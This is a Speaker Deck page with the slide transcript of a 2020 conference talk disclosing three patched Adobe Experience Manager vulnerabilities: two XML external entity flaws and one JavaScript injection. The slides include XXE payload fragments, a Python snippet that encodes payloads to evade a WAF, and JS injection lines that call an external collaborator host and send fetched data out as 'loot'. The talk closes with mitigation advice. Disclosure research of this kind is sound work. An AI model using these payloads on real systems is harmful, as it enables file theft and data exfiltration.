Upgrade to Pro — share decks privately, control downloads, hide ads and more …

A Hacker's perspective on AEM applications security

Mikhail Egorov
September 30, 2020
Programming
0
2.9k

A Hacker's perspective on AEM applications security

Adobe Experience Manager (AEM), is a comprehensive content management solution for building websites, managing marketing content and assets. I started to look into AEM security back in 2015. Since then I discovered and reported several server-side vulnerabilities and developed toolset for AEM hacking to automate security testing of AEM web-applications.

In 2019 I reported one code injection and three XML external entity (XXE) vulnerabilities to Adobe PSIRT. They are known as CVE-2019-8086, CVE-2019-8087, CVE-2019-8088. These vulnerabilities allow anonymous attackers to compromise AEM web-application.

In the talk, I will disclose details of discovered vulnerabilities and exploitation techniques.

Mikhail Egorov

September 30, 2020
Tweet

More Decks by Mikhail Egorov

See All by Mikhail Egorov
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
0ang3el
4
6.8k
Securing AEM webapps by hacking them
0ang3el
1
910
AEM hacker approaching Adobe Experience Manager webapps in bug bounty programs
0ang3el
3
7.4k
Hunting for security bugs in AEM webapps
0ang3el
2
22k
Neat tricks to bypass CSRF-protection
0ang3el
2
1.6k
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем веб-приложении
0ang3el
1
310

Other Decks in Programming

See All in Programming
社内のメンバーに「関数型プログラミングの学習・教育」についていろいろ聞いてみた
j5ik2o
1
440
Eloquentとクエリビルダを両方使った実装の失敗例 - 第150回 PHP勉強会 #phpstudy
kotomin_m
0
180
kotlin-resultを用いて鉄道志向なエラーハンドリングを試みる
blackbracken
1
170
PDF_TDX_2023_Apex__What_s_New_and_What_s_Coming.pdf
fishofprey
3
860
RISC-V 命令 / ISA 拡張ピックアップ ― 最近追加されたもの、これから追加されるもの、議論が進みつつあるもの
a4lg
0
110
Coroutines Test 入門 / Android Test Night #8
star_zero
2
280
ChatGPTによるデータ変換がもたらすインパクト
masahiro_nishimi
3
3.7k
いろいろなフレームワークの仕組みを index.php から読み解こう / index.php of each framework
okashoi
0
290
K/NとNSKeyedArchiverと私
ryunen344
0
180
Spring Modulithで始めるモジュラモノリス開発
yutootsuka
2
270
NIFTY Tech Talk #09 SvelteKitをサービスに導入してみた!
niftycorp
0
110
日常業務のカイゼンで図る開発チームへの貢献 - YAPC::Kyoto 2023
koluku
4
440

Featured

See All Featured
The Brand Is Dead. Long Live the Brand.
mthomps
48
3k
The Power of CSS Pseudo Elements
geoffreycrofte
53
4.4k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
2
480
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
318
19k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
31
8.9k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
7
670
How STYLIGHT went responsive
nonsquared
89
4.2k
Designing for humans not robots
tammielis
245
24k
Stop Working from a Prison Cell
hatefulcrawdad
264
18k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
31
20k
A Modern Web Designer's Workflow
chriscoyier
689
180k
Dealing with People You Can't Stand - Big Design 2015
cassininazir
351
21k

Transcript

  1. EUROPE'S LEADING AEM DEVELOPER CONFERENCE
    28th – 30th SEPTEMBER 2020
    A Hacker's perspective on AEM applications security
    Mikhail Egorov, Security researcher & bug hunter

    View Slide

  2. 2
    Intro

    View Slide

  3. whoami
    3
    ▪ Security researcher & full-time bug hunter
    ▪ https://bugcrowd.com/0ang3el
    ▪ https://hackerone.com/0ang3el
    ▪ Conference speaker
    ▪ https://www.slideshare.net/0ang3el
    ▪ https://speakerdeck.com/0ang3el

    View Slide

  4. whoami
    4
    ▪ Toolset for AEM hacking
    ▪ https://github.com/0ang3el/aem-hacker

    View Slide

  5. 5
    APSB19-48

    View Slide

  6. APSB19-48
    6
    ▪ http://helpx.adobe.com/security/products/experi
    ence-manager/apsb19-48.html
    ▪ CVE-2019-8086 / XML eXternal Entity Injection
    ▪ CVE-2019-8087 / XML eXternal Entity Injection
    ▪ CVE-2019-8088 / JavaScript Code Injection

    View Slide

  7. XML eXternal Entity (XXE) attacks
    7
    ▪ Do we see the parsed XML?
    ▪ What’s allowed by the XML parser?
    ▪ General external entities
    ▪ Parameter external entities
    ▪ External DTD loading

    View Slide

  8. XML eXternal Entity (XXE) attacks
    8



    ]>
    &xxe;
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync …

    View Slide

  9. XML eXternal Entity (XXE) attacks
    9



    %xxe;
    ]>

    View Slide

  10. XML eXternal Entity (XXE) attacks
    10

    ]>

    View Slide

  11. CVE-2019-8086
    11
    ▪ GuideInternalSubmitServlet
    @Service({Servlet.class})
    @Properties({@Property(
    name = "sling.servlet.resourceTypes",
    value = {"fd/af/components/guideContainer"}
    ), @Property(
    name = "sling.servlet.methods",
    value = {"POST"}
    ), @Property(
    name = "sling.servlet.selectors",
    value = {"af.internalsubmit"}
    )})
    public class GuideInternalSubmitServlet

    View Slide

  12. CVE-2019-8086
    12

    View Slide

  13. CVE-2019-8086
    13

    View Slide

  14. CVE-2019-8086
    14
    ▪ XXE payload



    ]>
    &a;

    View Slide

  15. CVE-2019-8086
    15

    View Slide

  16. CVE-2019-8086
    16
    ▪ Exploitation hints
    ▪ We can JSON-encode XXE payload to bypass a WAF
    ▪ In Java we can list directory content
    ▪ /proc/self/cwd

    View Slide

  17. CVE-2019-8086
    17
    ▪ JSON-encoding
    data = 'a SYSTEM "file:///etc/passwd">]>&a;'
    result = "“
    for c in data:
    result = result + "\\u00%02x" % ord(c)
    print result

    View Slide

  18. CVE-2019-8086
    18

    View Slide

  19. CVE-2019-8086
    19
    ▪ XXE payload



    ]>
    &a;

    View Slide

  20. CVE-2019-8086
    20

    View Slide

  21. CVE-2019-8086
    21
    ▪ Exploitation requirements
    ▪ There should be a node with
    fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/comp
    onents/guideContainer
    ▪ Attacker should have a jcr:write access
    somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

    View Slide

  22. CVE-2019-8086
    22
    ▪ Exploitation requirements
    ▪ Doesn’t work equally on different AEM versions
    ▪ Only blind SSRF for some versions

    ]>

    View Slide

  23. CVE-2019-8087
    23
    ▪ WSDLInvokerServlet
    @Service({Servlet.class})
    @Properties({@Property(
    name = "sling.servlet.resourceTypes",
    value = {"fd/af/components/guideContainer"}
    ), @Property(
    name = "sling.servlet.selectors",
    value = {"af.wsdl"}
    ), @Property(
    name = "sling.servlet.methods",
    value = {"POST"}
    )})
    public class WSDLInvokerServlet

    View Slide

  24. CVE-2019-8087
    24

    View Slide

  25. CVE-2019-8087
    25

    View Slide

  26. CVE-2019-8087
    26
    ▪ WSDL example
    ▪ https://cs.au.dk/~amoeller/WWW/webservices/wsdlexample.html

    View Slide

  27. CVE-2019-8087
    27

    View Slide

  28. CVE-2019-8087
    28
    ▪ Malicious xxe.wsdl



    %dtd;
    %param1;
    ]>




    View Slide

  29. CVE-2019-8087
    29
    ▪ Malicious loot.dtd

    ">

    View Slide

  30. CVE-2019-8087
    30

    View Slide

  31. CVE-2019-8087
    31
    ▪ Exploitation requirements
    ▪ There should be a node with
    fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/comp
    onents/guideContainer
    ▪ Attacker should have a jcr:write access
    somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

    View Slide

  32. CVE-2019-8087
    32
    ▪ Exploitation requirements
    ▪ Doesn’t work equally on different AEM versions
    ▪ On some AEM versions WSDLInvokerServlet is not
    present

    View Slide

  33. CVE-2019-8088
    33
    ▪ GuideSubmitServlet
    @Service({Servlet.class})
    @Properties({@Property(
    name = "sling.servlet.resourceTypes",
    value = {"fd/af/components/guideContainer"}
    ), @Property(
    name = "sling.servlet.methods",
    value = {"POST"}
    ), @Property(
    name = "sling.servlet.selectors",
    value = {"af.submit", "af.agreement", "af.signSubmit"}
    )})
    public class GuideSubmitServlet extends SlingAllMethodsServlet {

    View Slide

  34. CVE-2019-8088
    34

    View Slide

  35. CVE-2019-8088
    35

    View Slide

  36. CVE-2019-8088
    36

    View Slide

  37. CVE-2019-8088
    37

    View Slide

  38. CVE-2019-8088
    38

    View Slide

  39. CVE-2019-8088
    39
    ▪ Sandboxed Rhino engine on some AEM versions
    ▪ No RCE
    ▪ Sandbox allows network interactions
    ▪ SSRF w/ ability to see the response

    View Slide

  40. CVE-2019-8088
    40
    ▪ JS payload
    ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollabo
    rator.net');//

    View Slide

  41. CVE-2019-8088
    41

    View Slide

  42. CVE-2019-8088
    42

    View Slide

  43. CVE-2019-8088
    43
    ▪ JS payload
    ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollabo
    rator.net',function(data){jQuery.get('http://727a14ifhq8on9vakss
    k6agtlkrafz.burpcollaborator.net',{loot:data})});//

    View Slide

  44. CVE-2019-8088
    44

    View Slide

  45. CVE-2019-8088
    45

    View Slide

  46. CVE-2019-8088
    46
    ▪ Exploitation requirements
    ▪ There should be a node with
    fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/comp
    onents/guideContainer
    ▪ Attacker should have a jcr:write access
    somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

    View Slide

  47. CVE-2019-8088
    47
    ▪ Exploitation requirements
    ▪ Doesn’t work equally on different AEM versions
    ▪ RCE or SSRF

    View Slide

  48. APSB19-48
    48
    ▪ Keep AEM up to date
    ▪ http://helpx.adobe.com/security/products/experie
    nce-manager/apsb19-48.html
    ▪ Block jcr:write access for anonymous user
    ▪ /content/usergenerated/etc/commerce/smartlists/
    ▪ Remove demo content (Geometrixx, WeRetail, …)

    View Slide

  49. 49
    Thank you
    @0ang3el

    View Slide